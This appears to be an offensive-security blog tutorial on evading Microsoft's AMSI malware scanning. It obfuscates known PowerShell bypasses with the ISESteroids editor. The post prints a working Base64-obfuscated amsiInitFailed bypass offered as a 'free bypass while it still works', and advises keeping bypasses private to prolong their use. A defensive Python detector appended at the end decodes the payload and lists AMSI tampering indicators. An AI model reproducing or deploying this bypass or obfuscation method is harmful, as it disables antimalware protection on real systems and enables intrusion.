- AMSI Write Raid Bypass Vulnerability
- Installing ISE Steroids
- Obfuscating the payload
- Resurrecting dinosaurs with Roids
AMSI Write Raid Bypass Vulnerability
A very popular article circulated recently by Victor Khoury (Vixx), in which he introduced his new AMSI bypass technique, designed to bypass AMSI without calling the VirtualProtect API and without changing memory protection. You can read it in full here; it's a good read and goes into depth on how this was actually found.
So that's all well and good, we have a shiny new AMSI bypass to use on engagements now, right?!?
Nope, computer says that's bad! Not surprising really, as Victor reported this vulnerability to Microsoft on the 8th of April 2024. So what can we do now, it's over, right? Well, maybe not. Let's pump it full of Steroids!
Installing ISE Steroids
So what is ISE Steroids? You can find more information here. In their own words, "ISESteroids is a powerful extension for the built-in ISE PowerShell editor". But we aren't going to use the full functionality of it; I'm just interested in its obfuscate function. I know there are other products and scripts we can use to do this, I just found this one worked well with AMSI bypasses, so I've stuck with it.
- Open PowerShell as administrator and run the below command.
Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery -Force
- If prompted, click Yes.
- Once installation has completed, use the below command to start the ISE Steroids interface.
Start-Steroids
- Accept the license; you can even read it if you like.
Obfuscating the payload
OK, so we have this fancy new interface.
- Copy and paste the payload from the author's GitHub (linked here) into the main window. It should look something like this.
- Select Tools → Obfuscate Code…
- Leave all options selected and click on OK.
- OK, that code now looks disgusting. Excellent!
- Time to test it. First we run the code below to ensure that AMSI is in fact running at the moment.
'amsiutils'
- OK, so we have AMSI running. Time to try running the script. Select all (Ctrl+A), then click on the Run Selection button.
- Ah, that's nice, it didn't complain like the original script.
- Time to verify.
OK, so no luck with that one. I have previously had a lot of success using this method, so let's see how far we can push it.
Resurrecting dinosaurs with Roids
OK, so maybe you don't believe this works, so let's use an extreme case. One of the very early and well-known AMSI bypasses was posted to Twitter (X) by Matt Graeber on the 24th of May 2016.
This should definitely not work any more!
- Testing the original, which is rightfully blocked.
- So what if we obfuscate as we did previously? Keep an eye on the tabs at the top: every time we obfuscate, a new tab is created. OK, so it looks more disgusting, which is what we want.
- OK, so it didn't complain. Let's verify this.
Yup, AMSI is dead! With a single obfuscation, an AMSI bypass that is almost 8 years old still works. Full disclosure: the first time I did this I had to obfuscate this AMSI bypass about 6 times before it worked, so your mileage may vary. But there you have it: go find your own, keep it in your back pocket and don't share it online, and you should have a bypass that lasts a decent amount of time. I have one I've been using for over 2 years that still works a treat.
So here it is in its entirety. Enjoy yourself a free bypass while it still works.
[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)
Some more proof in a different PowerShell window.
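From the defender's side, here is an added example (not from the original post, ISESteroids or the bypass author) that peels the Base64-wrapped strings out of the payload above and flags the AMSI-related identifiers they hide, the kind of check a detection engineer would run over PowerShell script block log entries; the sample script, the indicator list and the function names are my own constructions.

```python
import base64
import re

# Constructed sample: the Base64-wrapped bypass shown above, as it would land in a
# PowerShell script block log (Event ID 4104) entry.
SAMPLE_SCRIPT = (
    "[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA=='))))"
    ".GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String("
    "'YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString("
    "[Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)"
)

# Identifiers that only show up in scripts poking at AMSI internals (constructed list).
AMSI_INDICATORS = ("amsiutils", "amsiinitfailed", "amsiscanbuffer", "amsicontext")

B64_LITERAL = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.IGNORECASE
)


def decode_literal(b64: str) -> str:
    """Decode one Base64 literal as UTF-16LE ([Text.Encoding]::Unicode) or UTF-8."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return ""
    # UTF-16LE ASCII text has a NUL in every odd byte position.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError:
        return ""


def deobfuscate(script: str) -> str:
    """Replace every FromBase64String('...') literal with its decoded text."""
    return B64_LITERAL.sub(lambda m: "'" + decode_literal(m.group(1)) + "'", script)


def amsi_tamper_indicators(script: str) -> list:
    """Indicators present after one layer of decoding; empty list means no match.
    Only one Base64 layer is peeled, so other obfuscation is not covered here."""
    haystack = deobfuscate(script).lower()
    return [ind for ind in AMSI_INDICATORS if ind in haystack]
```

Because a tool like the one in this post can rewrite the strings in ways this single decode pass will not undo, treat a hit as one signal and pair it with script block logging and AMSI provider telemetry rather than relying on string matching alone.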